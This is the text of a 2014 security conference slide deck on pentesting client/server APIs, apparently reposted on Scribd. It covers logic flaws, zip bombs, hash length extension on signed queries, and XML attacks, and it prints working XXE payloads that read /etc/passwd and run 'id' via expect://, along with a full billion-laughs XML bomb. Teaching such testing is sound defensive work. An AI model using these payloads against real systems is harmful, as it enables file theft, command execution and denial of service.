0% found this document useful (0 votes)
228 views58 pages

API Pentest

Contain about various api and all

Uploaded by

Mr. Ramya Shah
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
228 views58 pages

API Pentest

Contain about various api and all

Uploaded by

Mr. Ramya Shah
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 58

Pentesting client/server API

Sergey Belov
$ whoami

• Senior Security Auditor at Digital Security


• BugHunter: Google, Yandex, Badoo, Yahoo +++
• Writer: habrahabr, Xakep magazine
• CTF: DEFCON 2012 CTF Final, Chaos Construction
CTF’2013
• Speaker: CodeFest 2012, ZeroNights 0x03
• Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)
© 2002—2014, Digital Security 2
What are we talking about?

API

© 2002—2014, Digital Security 3


What are we talking about?

API

© 2002—2014, Digital Security 4


Hacking via API

© 2002—2014, Digital Security 5


Hacking via API

© 2002—2014, Digital Security 6


Hacking via API

From interface to API methods

© 2002—2014, Digital Security 7


Hacking via API

© 2002—2014, Digital Security 8


Hacking via API

© 2002—2014, Digital Security 9


Hacking via API

© 2002—2014, Digital Security 10


Hacking via API

© 2002—2014, Digital Security 11


Hacking via API

What should we test?


• Logic!
• Bypassing restrictions (sqli/xss)
• Parameter tampering
Developing
• Stop hacks and custom implementation in API! Really

© 2002—2014, Digital Security 12


Hacking via API

© 2002—2014, Digital Security 13


Hacking via API

ZIP
© 2002—2014, Digital Security 14
Hacking via API

42 Kb…

© 2002—2014, Digital Security 15


Hacking via API

42 Kb…
…10 Gb?

© 2002—2014, Digital Security 16


Hacking via API

42 Kb…
…10 Gb?
…100 Gb?

© 2002—2014, Digital Security 17


Hacking via API

42 Kb…
…10 Gb?
…100 Gb?
…100 Tb?

© 2002—2014, Digital Security 18


Hacking via API

42 Kb…
…10 Gb?
…100 Gb?
…100 Tb?

© 2002—2014, Digital Security


…4.5 Pb! http://www.unforgettable.dk/
19
Hacking via API

Say
HELLO
to
© 2002—2014, Digital Security
ZIP BOMB! 20
Hacking via API

The evil of JavaScript


and

© 2002—2014, Digital Security 21


Hacking via API

© 2002—2014, Digital Security 22


Hacking via API

© 2002—2014, Digital Security 23


Hacking via API

http://habrahabr.ru/post/186160/
© 2002—2014, Digital Security 24
Hacking via API

Crypto
© 2002—2014, Digital Security 25
Hacking via API

Query signing
Sign = sha*(…+DATA+…)

APIkey 26
© 2002—2014, Digital Security
Hacking via API

© 2002—2014, Digital Security 27


Hacking via API

But why?
© 2002—2014, Digital Security 28
Hacking via API

Say hello again.


To length extension attack
© 2002—2014, Digital Security 29
Hacking via API

A=1&B=2&C=3
07ce36c769ae130708258fb5dfa3d37ca5a67514
TOKEN=sha1(KEY+DATA)

© 2002—2014, Digital Security 30


Hacking via API

Some have hijacked just 1 request…

© 2002—2014, Digital Security 31


Hacking via API

What does the attacker know?


• Original data
• Sign (token)

© 2002—2014, Digital Security 32


Hacking via API

What does the attacker want?

Change some data / change params


© 2002—2014, Digital Security 33
Hacking via API

A=1&B=2&C=3\x80\x00\x00…\x02&C=4

© 2002—2014, Digital Security 34


Hacking via API

Can sign new query without API key!


Vkontakte: sig = md5(name1=value1name2=value2api_secret)
Mail.RU sig = md5(uid + params + private_key)

http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
© 2002—2014, Digital Security 35
Hacking via API

Request hijacking…
How?

© 2002—2014, Digital Security 36


Hacking via API

© 2002—2014, Digital Security 37


Hacking via API

© 2002—2014, Digital Security 38


Hacking via API

© 2002—2014, Digital Security 39


Hacking via API

© 2002—2014, Digital Security 40


Hacking via API

© 2002—2014, Digital Security 41


Hacking via API

© 2002—2014, Digital Security 42


Hacking via API

© 2002—2014, Digital Security 43


Hacking via API

© 2002—2014, Digital Security 44


Hacking via API

XML? XML entities!

© 2002—2014, Digital Security 45


Hacking via API

DTD Example:

<!ENTITY writer "Donald Duck.">


<!ENTITY copyright "Copyright W3Schools.">

XML example:

<author>&writer;&copyright;</author>

© 2002—2014, Digital Security 46


Hacking via API

XML entities?
External Entity!
© 2002—2014, Digital Security 47
Hacking via API

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
"file:///etc/passwd" >]>

<foo>&xxe;</foo>
© 2002—2014, Digital Security 48
Hacking via API

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
“expect://id" >]>

<foo>&xxe;</foo>
© 2002—2014, Digital Security 49
Hacking via API

XML Bombs!
© 2002—2014, Digital Security 50
Hacking via API
<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz
(#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]>
<lolz>&lol9;</lolz>
© 2002—2014, Digital Security 51
What are we talking about?

Man in the Middle

© 2002—2014, Digital Security 52


Hacking via API

Examples?

© 2002—2014, Digital Security 53


Hacking via API

2013-11-19 by Reginaldo Silva


© 2002—2014, Digital Security 54
Hacking via API

https://www.facebook.com/BugBounty/posts/778897822124446
http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
© 2002—2014, Digital Security 55
Hacking via API

Testing:
• https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)
• XXE to RCE https://gist.github.com/joernchen/3623896

Development:
• Disable entities

© 2002—2014, Digital Security 56


Hacking via API

Finally:
• Re-test all interface restrictions;
• Specific compressions;
• JS callbacks;
• Crypto + SSL test + hardcoded credentials (hackapp.com);
• XML - XXE;
• Anything else :]
© 2002—2014, Digital Security 57
Hacking via API

Thanks for your attention!


Questions?

Digital Security в Москве: (495) 223-07-86


Digital Security в Санкт-Петербурге: (812) 703-15-47
twitter.com/sergeybelove
sbelov@dsec.ru
© 2002—2014, Digital Security 58

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy